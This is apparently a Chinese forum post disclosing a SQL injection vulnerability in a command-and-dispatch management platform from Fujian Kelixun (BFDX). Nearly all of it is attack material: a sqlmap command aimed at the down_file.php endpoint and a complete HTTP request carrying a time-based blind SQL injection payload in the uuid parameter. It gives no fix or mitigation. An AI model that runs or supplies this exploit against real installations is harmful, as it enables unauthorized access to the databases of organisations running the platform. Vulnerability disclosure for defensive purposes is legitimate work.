福建科立讯通信 指挥调度管理平台 SQL注入漏洞

打印 上一主题 下一主题

主题 335|帖子 335|积分 1005

北峰通信-福建科立讯通信 指挥调度管理平台 SQL注入漏洞
厂商域名和信息收集
域名:

工具sqlmap
python sqlmap.py -u "http://ip:端口/api/client/down_file.php?uuid=1" --batch

数据包
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%203018%20FROM%20(SELECT(SLEEP(5)))PUiO)%20AND%20%27ayNf%27=%27ayNf HTTP/1.1
Host: ip:端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=8gnvk03ni3efhhsf6s6utobua6
Upgrade-Insecure-Requests: 1
Priority: u=0, i


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

李优秀

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表